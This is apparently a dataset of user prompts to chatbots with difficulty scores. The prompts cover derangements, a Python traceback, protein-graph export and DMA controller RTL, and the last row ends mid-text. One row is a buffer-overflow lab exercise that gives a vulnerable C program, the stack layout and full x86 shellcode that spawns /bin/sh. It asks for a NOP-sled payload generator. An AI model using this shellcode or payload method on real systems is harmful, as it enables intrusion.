| row_id (int64, 0-48.4k) | init_message (string, length 1-342k) | conversation_hash (string, length 32) | scores (dict) |
|---|---|---|---|
46,687
|
The random, uniform generation of derangements is very simple. Since
Dn ≈ n!/e, the obvious procedure of generating a random permutation,
checking whether it is a derangement, and generating a new permutation in the
negative case, is straightforward and guarantees a linear time complexity,
at least on average; actually, as we will see, the average complexity is
µ1 ≈ e(n − 1).
give code for above
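A minimal Python sketch of the rejection procedure just described (the function name is my own; the loop redraws until the permutation has no fixed point, so the expected number of trials is about e):

import random

def random_derangement(n):
    # Draw uniform random permutations until one is a derangement.
    while True:
        p = list(range(n))
        random.shuffle(p)
        if all(p[i] != i for i in range(n)):
            return p

print(random_derangement(10))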
|
9bf96583f0b8ee5cb825e94c7edc3b32
|
{
"intermediate": 0.27354782819747925,
"beginner": 0.11506301909685135,
"expert": 0.61138916015625
}
|
46,688
|
Traceback (most recent call last):
File "C:\Users\Administrator\OneDrive\SHARE\BLURUSDT\blurusdt.py", line 430, in <module>
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python3105\lib\os.py", line 542, in execl
execv(file, args)
OSError: [Errno 12] Not enough space
|
4a895a3c119af1e0f744d48fded6ad27
|
{
"intermediate": 0.4232935905456543,
"beginner": 0.29219454526901245,
"expert": 0.28451189398765564
}
|
46,689
|
vuln_program.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char passwd[] = "asd";
char usr_input[4];
void target() {
printf("You have entered the correct passwd\n");
exit(0);
}
void prompt(){
char buf[4];
gets(buf);
strncpy(usr_input, buf, 4);
}
int main(){
prompt();
if(strcmp(usr_input, passwd) == 0) {
target();
}else {
printf("Wrong passwd!\n");
exit(1);
}
return 0;
}
Target function address is 08049196.
The following will help you understand the structure of an attack string:
The stack layout of the vulnerable program contains buf, which is 4 bytes, other vars, which are 8 bytes, %ebp, which is 4 bytes, %eip and &arg1 while the prompt function is being invoked. The goal is to overwrite the buffer until the return address (%eip) on the stack contains the target function address. One thing to be aware of is that the address is in little-endian format. For example, if the target address is "0xdeadbeef", then the bytes of the return address at RA will be RA[0]:ef, RA[1]:be, RA[2]:ad, RA[3]:de.
Stack layout of launching shellcode must contain buffer, return address %eip, nop nop nop....., injected code.
Overwrite the buffer in a specific way that:
Overwrite the buffer with padding.
Overwrite the return address(%eip) on the stack with a guessed address that probably will jump to the injected malicious code.
NOPs (0x90) can be filled in between the return address and the injected malicious code to increase the chance that the injected code will be executed. The nop instruction does nothing; execution simply falls through to the next instruction.
The shellcode is then provided as the payload at the end of the overwrite.
The shellcode that is used to launch a shell is provided as following:
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
Write the attack program to generate the attack payload for this shellcode exploitation.
Providing the argument as ”shellcode” to the attack program must generate the shellcode attack payload. For example, if your code is written in python, run your program as "python3 attack.py shellcode". The output of your program should be a file named "shell_string" which stores the attack payload for launching the shellcode.
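A sketch of such an attack program in Python, modeled on the attack.py that appears in later rows of this dump; the 16-byte padding (buf + other vars + %ebp) follows the stack layout above, while the guessed stack address and the NOP-sled length are purely illustrative assumptions:

import sys

SHELLCODE = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3"
             b"\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh"
             b"\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

def generate_shellcode_payload():
    padding = b"A" * (4 + 8 + 4)                       # buf[4] + other vars[8] + %ebp[4]
    guessed_addr = (0xffffd000).to_bytes(4, "little")  # assumed guess; adjust for the actual stack
    nops = b"\x90" * 64                                # NOP sled before the injected code
    return padding + guessed_addr + nops + SHELLCODE

if __name__ == "__main__":
    if len(sys.argv) == 2 and sys.argv[1] == "shellcode":
        with open("shell_string", "wb") as f:
            f.write(generate_shellcode_payload())
        print("Attack payload saved to 'shell_string'.")
    else:
        print("Usage: python3 attack.py shellcode")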
|
1ed04a255fec205b93b45143a4da3d8c
|
{
"intermediate": 0.5355784296989441,
"beginner": 0.25418639183044434,
"expert": 0.2102351188659668
}
|
46,690
|
User
from graphein.protein.graphs import read_pdb_to_dataframe, process_dataframe, deprotonate_structure, convert_structure_to_centroids, remove_insertions
from graphein.protein.graphs import construct_graph
from graphein.protein.visualisation import plotly_protein_structure_graph
import csv
# Your existing code to construct the graph
processing_funcs = [deprotonate_structure, convert_structure_to_centroids, remove_insertions]
pdb_code = "1A02" # Example PDB code
raw_df = read_pdb_to_dataframe(pdb_code=pdb_code)
df = process_dataframe(raw_df, atom_df_processing_funcs=processing_funcs)
g = construct_graph(pdb_code=pdb_code)
# Visualization code
p = plotly_protein_structure_graph(
g,
colour_edges_by="kind",
colour_nodes_by="degree",
label_node_ids=False,
plot_title="Residue-level graph",
node_size_multiplier=1
)
p.show()
# New code to store node data in a CSV file
with open('node_data.csv', 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(["Node ID", "Node Data"]) # Write the header
for node, data in g.nodes(data=True):
writer.writerow([node, data]) # Write each node's ID and its data
Modify above code to extract more data, if possible all data from each node.
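One possible modification (a sketch; which attribute keys exist depends on how the graph was constructed) is to flatten every attribute of each node's data dict into its own CSV column:

# Collect the union of attribute keys across all nodes, then write one column per key.
all_keys = sorted({k for _, data in g.nodes(data=True) for k in data})
with open('node_data.csv', 'w', newline='') as file:
    writer = csv.writer(file)
    writer.writerow(["Node ID"] + all_keys)
    for node, data in g.nodes(data=True):
        writer.writerow([node] + [data.get(k, "") for k in all_keys])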
|
4e83e57ff8f71b53fdee8993ed9488cf
|
{
"intermediate": 0.5988343358039856,
"beginner": 0.191330224275589,
"expert": 0.20983541011810303
}
|
46,691
|
<<<StartOfFile:DMAC/RTL/DMAC_CFG.sv>>>
module DMAC_CFG
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// configuration registers
output reg [31:0] src_addr_o,
output reg [31:0] dst_addr_o,
output reg [15:0] byte_len_o,
output wire start_o,
input wire done_i
);
// Configuration register to read/write
reg [31:0] src_addr;
reg [31:0] dst_addr;
reg [15:0] byte_len;
//----------------------------------------------------------
// Write
//----------------------------------------------------------
// an APB write occurs when PSEL & PENABLE & PWRITE
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// wren : _______----_____________________________
//
// DMA start command must be asserted when APB writes 1 to the DMA_CMD
// register
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// paddr : |DMA_CMD|
// pwdata : | 1 |
// start : _______----_____________________________
wire wren = psel_i & penable_i & pwrite_i;
always @(posedge clk) begin
if (!rst_n) begin
src_addr <= 32'd0;
dst_addr <= 32'd0;
byte_len <= 16'd0;
end
else if (wren) begin
case (paddr_i)
'h100: src_addr <= pwdata_i[31:0];
'h104: dst_addr <= pwdata_i[31:0];
'h108: byte_len <= pwdata_i[15:0];
endcase
end
end
wire start = wren & (paddr_i=='h10C) & pwdata_i[0];
//----------------------------------------------------------
// READ
//----------------------------------------------------------
// an APB read occurs when PSEL & PENABLE & !PWRITE
// To make read data a direct output from register,
// this code shall buffer the muxed read data into a register
// in the SETUP cycle (PSEL & !PENABLE)
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ________________________________________
// reg update : ___----_________________________________
// prdata : |DATA
reg [31:0] rdata;
always @(posedge clk) begin
if (!rst_n) begin
rdata <= 32'd0;
end
else if (psel_i & !penable_i & !pwrite_i) begin // in the setup cycle in the APB state diagram
case (paddr_i)
'h0: rdata <= 32'h0001_2024;
'h100: rdata <= src_addr;
'h104: rdata <= dst_addr;
'h108: rdata <= {16'd0, byte_len};
'h110: rdata <= {31'd0, done_i};
default: rdata <= 32'd0;
endcase
end
end
// output assignments
assign pready_o = 1'b1;
assign prdata_o = rdata;
assign pslverr_o = 1'b0;
assign src_addr_o = src_addr;
assign dst_addr_o = dst_addr;
assign byte_len_o = byte_len;
assign start_o = start;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_CFG.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
module DMAC_ENGINE
(
input wire clk,
input wire rst_n, // _n means active low
// configuration registers
input wire [31:0] src_addr_i,
input wire [31:0] dst_addr_i,
input wire [15:0] byte_len_i,
input wire start_i,
output wire done_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (W channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
// mnemonics for state values
localparam S_IDLE = 3'd0,
S_RREQ = 3'd1,
S_RDATA = 3'd2,
S_WREQ = 3'd3,
S_WDATA = 3'd4;
reg [2:0] state, state_n;
reg [31:0] src_addr, src_addr_n;
reg [31:0] dst_addr, dst_addr_n;
reg [15:0] cnt, cnt_n;
reg [3:0] wcnt, wcnt_n;
reg arvalid,
rready,
awvalid,
wvalid,
wlast,
done;
wire fifo_full,
fifo_empty;
reg fifo_wren,
fifo_rden;
wire [31:0] fifo_rdata;
// it's desirable to code registers in a simple way
always_ff @(posedge clk)
if (!rst_n) begin
state <= S_IDLE;
src_addr <= 32'd0;
dst_addr <= 32'd0;
cnt <= 16'd0;
wcnt <= 4'd0;
end
else begin
state <= state_n;
src_addr <= src_addr_n;
dst_addr <= dst_addr_n;
cnt <= cnt_n;
wcnt <= wcnt_n;
end
// this block programs output values and next register values
// based on states.
always_comb begin
// **********************
// **********************
// FILL YOUR CODE HERE
// **********************
// **********************
end
DMAC_FIFO u_fifo
(
.clk (clk),
.rst_n (rst_n),
.full_o (fifo_full),
.wren_i (fifo_wren),
.wdata_i (rdata_i),
.empty_o (fifo_empty),
.rden_i (fifo_rden),
.rdata_o (fifo_rdata)
);
// Output assigments
assign done_o = done;
assign awid_o = 4'd0;
assign awaddr_o = dst_addr;
assign awlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign awsize_o = 3'b010; // 4 bytes per transfer
assign awburst_o = 2'b01; // incremental
assign awvalid_o = awvalid;
assign wid_o = 4'd0;
assign wdata_o = fifo_rdata;
assign wstrb_o = 4'b1111; // all bytes within 4 byte are valid
assign wlast_o = wlast;
assign wvalid_o = wvalid;
assign bready_o = 1'b1;
assign arvalid_o = arvalid;
assign araddr_o = src_addr;
assign arid_o = 4'd0;
assign arlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign arsize_o = 3'b010; // 4 bytes per transfer
assign arburst_o = 2'b01; // incremental
assign arvalid_o = arvalid;
assign rready_o = rready & !fifo_full;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
module DMAC_FIFO #(
parameter DEPTH_LG2 = 4,
parameter DATA_WIDTH = 32
)
(
input wire clk,
input wire rst_n,
output wire full_o,
input wire wren_i,
input wire [DATA_WIDTH-1:0] wdata_i,
output wire empty_o,
input wire rden_i,
output wire [DATA_WIDTH-1:0] rdata_o
);
localparam FIFO_DEPTH = (1<<DEPTH_LG2);
reg [DATA_WIDTH-1:0] data[FIFO_DEPTH];
reg full, full_n,
empty, empty_n;
reg [DEPTH_LG2:0] wrptr, wrptr_n,
rdptr, rdptr_n;
// reset entries to all 0s
always_ff @(posedge clk)
if (!rst_n) begin
full <= 1'b0;
empty <= 1'b1; // empty right after reset
wrptr <= {(DEPTH_LG2+1){1'b0}};
rdptr <= {(DEPTH_LG2+1){1'b0}};
for (int i=0; i<FIFO_DEPTH; i++) begin
data[i] <= {DATA_WIDTH{1'b0}};
end
end
else begin
full <= full_n;
empty <= empty_n;
wrptr <= wrptr_n;
rdptr <= rdptr_n;
if (wren_i) begin
data[wrptr[DEPTH_LG2-1:0]] <= wdata_i;
end
end
always_comb begin
wrptr_n = wrptr;
rdptr_n = rdptr;
if (wren_i) begin
wrptr_n = wrptr + 'd1;
end
if (rden_i) begin
rdptr_n = rdptr + 'd1;
end
empty_n = (wrptr_n == rdptr_n);
full_n = (wrptr_n[DEPTH_LG2]!=rdptr_n[DEPTH_LG2])
&(wrptr_n[DEPTH_LG2-1:0]==rdptr_n[DEPTH_LG2-1:0]);
end
// synthesis translate_off
always @(posedge clk) begin
if (full_o & wren_i) begin
\$display("FIFO overflow");
@(posedge clk);
\$finish;
end
end
always @(posedge clk) begin
if (empty_o & rden_i) begin
\$display("FIFO underflow");
@(posedge clk);
\$finish;
end
end
// synthesis translate_on
assign full_o = full;
assign empty_o = empty;
assign rdata_o = data[rdptr[DEPTH_LG2-1:0]];
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_TOP.sv>>>
module DMAC_TOP
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (AW channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
wire [31:0] src_addr;
wire [31:0] dst_addr;
wire [15:0] byte_len;
wire start;
wire done;
DMAC_CFG u_cfg(
.clk (clk),
.rst_n (rst_n),
// AMBA APB interface
.psel_i (psel_i),
.penable_i (penable_i),
.paddr_i (paddr_i),
.pwrite_i (pwrite_i),
.pwdata_i (pwdata_i),
.pready_o (pready_o),
.prdata_o (prdata_o),
.pslverr_o (pslverr_o),
.src_addr_o (src_addr),
.dst_addr_o (dst_addr),
.byte_len_o (byte_len),
.start_o (start),
.done_i (done)
);
DMAC_ENGINE u_engine(
.clk (clk),
.rst_n (rst_n),
// configuration registers
.src_addr_i (src_addr),
.dst_addr_i (dst_addr),
.byte_len_i (byte_len),
.start_i (start),
.done_o (done),
// AMBA AXI interface (AW channel)
.awid_o (awid_o),
.awaddr_o (awaddr_o),
.awlen_o (awlen_o),
.awsize_o (awsize_o),
.awburst_o (awburst_o),
.awvalid_o (awvalid_o),
.awready_i (awready_i),
// AMBA AXI interface (W channel)
.wid_o (wid_o),
.wdata_o (wdata_o),
.wstrb_o (wstrb_o),
.wlast_o (wlast_o),
.wvalid_o (wvalid_o),
.wready_i (wready_i),
// AMBA AXI interface (B channel)
.bid_i (bid_i),
.bresp_i (bresp_i),
.bvalid_i (bvalid_i),
.bready_o (bready_o),
// AMBA AXI interface (AR channel)
.arid_o (arid_o),
.araddr_o (araddr_o),
.arlen_o (arlen_o),
.arsize_o (arsize_o),
.arburst_o (arburst_o),
.arvalid_o (arvalid_o),
.arready_i (arready_i),
// AMBA AXI interface (R channel)
.rid_i (rid_i),
.rdata_i (rdata_i),
.rresp_i (rresp_i),
.rlast_i (rlast_i),
.rvalid_i (rvalid_i),
.rready_o (rready_o)
);
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_TOP.sv>>>
<<<StartOfFile:DMAC/RTL/filelist.f>>>
-sverilog $LAB_PATH/RTL/DMAC_TOP.sv
-sverilog $LAB_PATH/RTL/DMAC_CFG.sv
-sverilog $LAB_PATH/RTL/DMAC_ENGINE.sv
-sverilog $LAB_PATH/RTL/DMAC_FIFO.sv
<<<EndOfFile:DMAC/RTL/filelist.f>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
interface AXI_AW_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic awvalid;
logic awready;
logic [ID_WIDTH-1:0] awid;
logic [ADDR_WIDTH-1:0] awaddr;
logic [3:0] awlen;
logic [2:0] awsize;
logic [1:0] awburst;
endinterface
interface AXI_W_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic wvalid;
logic wready;
logic [ID_WIDTH-1:0] wid;
logic [DATA_WIDTH-1:0] wdata;
logic [DATA_WIDTH/8-1:0] wstrb;
logic wlast;
endinterface
interface AXI_B_CH
#(
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic bvalid;
logic bready;
logic [ID_WIDTH-1:0] bid;
logic [1:0] bresp;
endinterface
interface AXI_AR_CH
#(
parameter ADDR_WIDTH = `AXI_ADDR_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic arvalid;
logic arready;
logic [ID_WIDTH-1:0] arid;
logic [ADDR_WIDTH-1:0] araddr;
logic [3:0] arlen;
logic [2:0] arsize;
logic [1:0] arburst;
endinterface
interface AXI_R_CH
#(
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH
)
(
input clk
);
logic rvalid;
logic rready;
logic [ID_WIDTH-1:0] rid;
logic [DATA_WIDTH-1:0] rdata;
logic [1:0] rresp;
logic rlast;
endinterface
interface APB (
input clk
);
logic psel;
logic penable;
logic [31:0] paddr;
logic pwrite;
logic [31:0] pwdata;
logic pready;
logic [31:0] prdata;
logic pslverr;
modport master (
input clk,
input pready, prdata, pslverr,
output psel, penable, paddr, pwrite, pwdata
);
task init();
psel = 1'b0;
penable = 1'b0;
paddr = 32'd0;
pwrite = 1'b0;
pwdata = 32'd0;
endtask
task write(input int addr,
input int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b1;
pwdata = data;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
task read(input int addr,
output int data);
#1
psel = 1'b1;
penable = 1'b0;
paddr = addr;
pwrite = 1'b0;
pwdata = 'hX;
@(posedge clk);
#1
penable = 1'b1;
@(posedge clk);
while (pready==1'b0) begin
@(posedge clk);
end
data = prdata;
psel = 1'b0;
penable = 1'b0;
paddr = 'hX;
pwrite = 1'bx;
pwdata = 'hX;
endtask
endinterface
<<<EndOfFile:DMAC/SIM/TB/AXI_INTF.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
`include "../TB/AXI_TYPEDEF.svh"
module AXI_SLAVE
#(
parameter ADDR_WIDTH = 16,
parameter DATA_WIDTH = `AXI_DATA_WIDTH,
parameter ID_WIDTH = `AXI_ID_WIDTH,
parameter AWREADY_DELAY = 1,
parameter ARREADY_DELAY = 1,
parameter AR2R_DELAY = 50
)
(
input wire clk,
input wire rst_n, // _n means active low
AXI_AW_CH aw_ch,
AXI_W_CH w_ch,
AXI_B_CH b_ch,
AXI_AR_CH ar_ch,
AXI_R_CH r_ch
);
localparam DATA_DEPTH = 1<<ADDR_WIDTH;
logic [7:0] mem[DATA_DEPTH];
function void write_byte(int addr, input bit [7:0] wdata);
mem[addr] = wdata;
endfunction
function void write_word(int addr, input bit [31:0] wdata);
for (int i=0; i<4; i++) begin
write_byte(addr+i, wdata[8*i +: 8]); // [i*8+7:i*8]
end
endfunction
function bit [7:0] read_byte(int addr);
read_byte = mem[addr];
endfunction
function bit [31:0] read_word(int addr);
for (int i=0; i<4; i++) begin
read_word[8*i +: 8] = read_byte(addr+i);// [i*8+7:i*8]
end
endfunction
//----------------------------------------------------------
// write channels (AW, W, B)
//----------------------------------------------------------
localparam logic [1:0] S_W_IDLE = 0,
S_W_AWREADY = 1,
S_W_BURST = 2,
S_W_RESP = 3;
logic [1:0] wstate, wstate_n;
logic [7:0] wcnt, wcnt_n;
logic [ADDR_WIDTH-1:0] waddr, waddr_n;
logic [ID_WIDTH-1:0] wid, wid_n;
logic [3:0] wlen, wlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
wstate <= S_W_IDLE;
wcnt <= 8'd0;
waddr <= {ADDR_WIDTH{1'b0}};
wid <= {ID_WIDTH{1'b0}};
wlen <= 4'd0;
end
else begin
wstate <= wstate_n;
wcnt <= wcnt_n;
waddr <= waddr_n;
wid <= wid_n;
wlen <= wlen_n;
end
always @(*) begin
wstate_n = wstate;
wcnt_n = wcnt;
waddr_n = waddr;
wid_n = wid;
wlen_n = wlen;
aw_ch.awready = 1'b0;
w_ch.wready = 1'b0;
b_ch.bvalid = 1'b0;
case (wstate)
S_W_IDLE: begin
if (aw_ch.awvalid) begin
if (AWREADY_DELAY == 0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = AWREADY_DELAY-1;
wstate_n = S_W_AWREADY;
end
end
end
S_W_AWREADY: begin
if (wcnt==0) begin
waddr_n = aw_ch.awaddr;
wid_n = aw_ch.awid;
wlen_n = aw_ch.awlen;
aw_ch.awready = 1'b1;
wstate_n = S_W_BURST;
end
else begin
wcnt_n = wcnt - 8'd1;
end
end
S_W_BURST: begin
w_ch.wready = 1'b1;
if (w_ch.wvalid) begin
for (int i=0; i<DATA_WIDTH/8; i++) begin
write_byte(waddr + i, w_ch.wdata[i*8 +: 8]); // [i*8+7:i*8]
end
waddr_n = waddr + (DATA_WIDTH/8);
if (wlen==4'd0) begin
wstate_n = S_W_RESP;
end
else begin
wlen_n = wlen - 4'd1;
end
end
end
S_W_RESP: begin
b_ch.bvalid = 1'b1;
if (b_ch.bready) begin
wstate_n = S_W_IDLE;
end
end
endcase
end
//----------------------------------------------------------
// read channel (AR, R)
//----------------------------------------------------------
localparam logic [1:0] S_R_IDLE = 0,
S_R_ARREADY = 1,
S_R_DELAY = 2,
S_R_BURST = 3;
logic [1:0] rstate, rstate_n;
logic [7:0] rcnt, rcnt_n;
logic [ADDR_WIDTH-1:0] raddr, raddr_n;
logic [ID_WIDTH-1:0] rid, rid_n;
logic [3:0] rlen, rlen_n;
always_ff @(posedge clk)
if (!rst_n) begin
rstate <= S_R_IDLE;
rcnt <= 8'd0;
raddr <= {ADDR_WIDTH{1'b0}};
rid <= {ID_WIDTH{1'b0}};
rlen <= 4'd0;
end
else begin
rstate <= rstate_n;
rcnt <= rcnt_n;
raddr <= raddr_n;
rid <= rid_n;
rlen <= rlen_n;
end
always_comb begin
rstate_n = rstate;
rcnt_n = rcnt;
raddr_n = raddr;
rid_n = rid;
rlen_n = rlen;
ar_ch.arready = 1'b0;
r_ch.rvalid = 1'b0;
r_ch.rlast = 1'b0;
case (rstate)
S_R_IDLE: begin
if (ar_ch.arvalid) begin
if (ARREADY_DELAY == 0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = ARREADY_DELAY-1;
rstate_n = S_R_ARREADY;
end
end
end
S_R_ARREADY: begin
if (rcnt==0) begin
raddr_n = ar_ch.araddr;
rid_n = ar_ch.arid;
rlen_n = ar_ch.arlen;
ar_ch.arready = 1'b1;
rcnt_n = AR2R_DELAY - 1;
rstate_n = S_R_DELAY;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_DELAY: begin
if (rcnt==0) begin
rstate_n = S_R_BURST;
end
else begin
rcnt_n = rcnt - 8'd1;
end
end
S_R_BURST: begin
r_ch.rvalid = 1'b1;
r_ch.rlast = (rlen==4'd0);
for (int i=0; i<DATA_WIDTH/8; i++) begin
r_ch.rdata[i*8 +: 8] = read_byte(raddr + i); // [i*8+7:i*8]
end
if (r_ch.rready) begin
raddr_n = raddr + (DATA_WIDTH/8);
if (rlen==4'd0) begin
rstate_n = S_R_IDLE;
end
else begin
rlen_n = rlen - 4'd1;
end
end
end
endcase
end
// output assignments
assign b_ch.bid = wid;
assign b_ch.bresp = 2'd0;
assign r_ch.rid = rid;
assign r_ch.rresp = 2'd0;
endmodule
<<<EndOfFile:DMAC/SIM/TB/AXI_SLAVE.sv>>>
<<<StartOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
`ifndef __AXI_TYPEDEF_SVH__
`define __AXI_TYPEDEF_SVH__
`define AXI_ADDR_WIDTH 32
`define AXI_DATA_WIDTH 32
`define AXI_ID_WIDTH 4
`endif /* __AXI_TYPEDEF_SVH__ */
<<<EndOfFile:DMAC/SIM/TB/AXI_TYPEDEF.svh>>>
<<<StartOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
`define IP_VER 32'h000
`define SRC_ADDR 32'h100
`define DST_ADDR 32'h104
`define LEN_ADDR 32'h108
`define STAT_ADDR 32'h110
`define START_ADDR 32'h10c
`define TIMEOUT_CYCLE 999999
module DMAC_TOP_TB ();
reg clk;
reg rst_n;
// clock generation
initial begin
clk = 1'b0;
forever #10 clk = !clk;
end
// reset generation
initial begin
rst_n = 1'b0; // active at time 0
repeat (3) @(posedge clk); // after 3 cycles,
rst_n = 1'b1; // release the reset
end
// enable waveform dump
initial begin
$dumpfile("dump.vcd");
$dumpvars(0, u_DUT);
end
// timeout
initial begin
#`TIMEOUT_CYCLE $display("Timeout!");
$finish;
end
APB apb_if (.clk(clk));
AXI_AW_CH aw_ch (.clk(clk));
AXI_W_CH w_ch (.clk(clk));
AXI_B_CH b_ch (.clk(clk));
AXI_AR_CH ar_ch (.clk(clk));
AXI_R_CH r_ch (.clk(clk));
task test_init();
int data;
apb_if.init();
@(posedge rst_n); // wait for a release of the reset
repeat (10) @(posedge clk); // wait another 10 cycles
apb_if.read(`IP_VER, data);
\$display("---------------------------------------------------");
\$display("IP version: %x", data);
\$display("---------------------------------------------------");
\$display("---------------------------------------------------");
\$display("Reset value test");
\$display("---------------------------------------------------");
apb_if.read(`SRC_ADDR, data);
if (data===0)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`DST_ADDR, data);
if (data===0)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`LEN_ADDR, data);
if (data===0)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`STAT_ADDR, data);
if (data===1)
\$display("DMA_STATUS(pass): %x", data);
else begin
\$display("DMA_STATUS(fail): %x", data);
@(posedge clk);
\$finish;
end
endtask
task test_dma(input int src, input int dst, input int len);
int data;
int word;
realtime elapsed_time;
\$display("---------------------------------------------------");
\$display("Load data to memory");
\$display("---------------------------------------------------");
for (int i=src; i<(src+len); i=i+4) begin
word = \$random;
u_mem.write_word(i, word);
end
\$display("---------------------------------------------------");
\$display("Configuration test");
\$display("---------------------------------------------------");
apb_if.write(`SRC_ADDR, src);
apb_if.read(`SRC_ADDR, data);
if (data===src)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`DST_ADDR, dst);
apb_if.read(`DST_ADDR, data);
if (data===dst)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`LEN_ADDR, len);
apb_if.read(`LEN_ADDR, data);
if (data===len)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
\$display("---------------------------------------------------");
\$display("DMA start");
\$display("---------------------------------------------------");
apb_if.write(`START_ADDR, 32'h1);
elapsed_time = \$realtime;
\$display("---------------------------------------------------");
\$display("Wait for a DMA completion");
